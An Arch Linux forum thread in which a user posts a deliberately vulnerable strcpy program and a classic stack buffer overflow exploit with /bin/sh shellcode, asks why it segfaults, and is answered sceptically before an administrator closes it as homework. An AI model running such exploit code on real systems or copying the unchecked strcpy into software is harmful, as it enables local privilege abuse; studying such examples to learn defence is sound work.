Arch Linux

leetow2003

Member

Registered: 2012-04-08

Posts: 25

How to solve this problem?

I only want to test buffer overflow,
Look:

//vulnerable.c
#include <stdio.h>
#include <string.h>

int main(int argc,char *argv[])
{
  char buffer[512];
  if(argc>1)
    strcpy(buffer,argv[1]);
}

//exploit.c
#include <stdio.h>
#include <unistd.h>
#include <stdlib.h>
#include <string.h>

#define OFFSET 0
#define RET_POSITION 1024
#define RANGE 20
#define NOP 0x90

char shellcode[]=
"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x88\x46\x0c\xb0\x0b"
"\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
"\x80\xe8\xdc\xff\xff\xff/bin/sh";

unsigned long get_sp()
{
        __asm__("movl %esp,%eax");
}


int main(int argc, char *argv[])
{
        char buff[RET_POSITION+RANGE+1],*ptr;
        long addr;
        unsigned long sp;
        int offset=OFFSET,bsize=RET_POSITION+RANGE+1;
        int i;

        if(argc>1)
            offset=atoi(argv[1]);
        sp=get_sp();
        addr=sp-offset;

            for(i=0;i<bsize;i+=4)
          *((long*)(&(buff[i])))=addr;
    
        for(i=0;i<bsize-RANGE*2-strlen(shellcode)-1;i++)
            buff[i]=NOP;
    
        ptr=buff+(bsize-RANGE*2-strlen(shellcode)-1);
        for(i=0;i<strlen(shellcode);i++)
            *(ptr++)=shellcode[i];

        buff[bsize-1]='\0';

        printf("Jump to 0x%08x\n",addr);
        execl("./vulnerable","vulnerable",buff,0);

        return 0;
}

and when I compile the exploit.c,I add parameters:
-mpreferred-stack-boundary=2 -fno-stack-protector -z execstack
but I run ./exploit 500,or other positive value or negative value,
it always display:Segmentation fault,I only want to learn
buffer overflow,so who could help me?Thank you very much.

WonderWoofy

Member

From: Los Gatos, CA

Registered: 2012-05-19

Posts: 8,414

Re: How to solve this problem?

Please change your title to something that actually describes your issue.

Trent

Member

From: Baltimore, MD (US)

Registered: 2009-04-16

Posts: 990

Re: How to solve this problem?

Did you do research to find a particular type of buffer overflow exploit that your hardware and OS are susceptible to, or did you just copy something you found on the Internet? Most exploits have an annoying tendency to be fixed once people know they exist.

ewaller

Administrator

From: Pasadena, CA

Registered: 2009-07-13

Posts: 20,347

Re: How to solve this problem?

This has the look and feel of homework

Closing.  If I am wrong, please contact a moderator and make a case.  Leaving the thread here -- for now.

---

Nothing is too wonderful to be true, if it be consistent with the laws of nature -- Michael Faraday
Sometimes it is the people no one can imagine anything of who do the things no one can imagine. -- Alan Turing
---
How to Ask Questions the Smart Way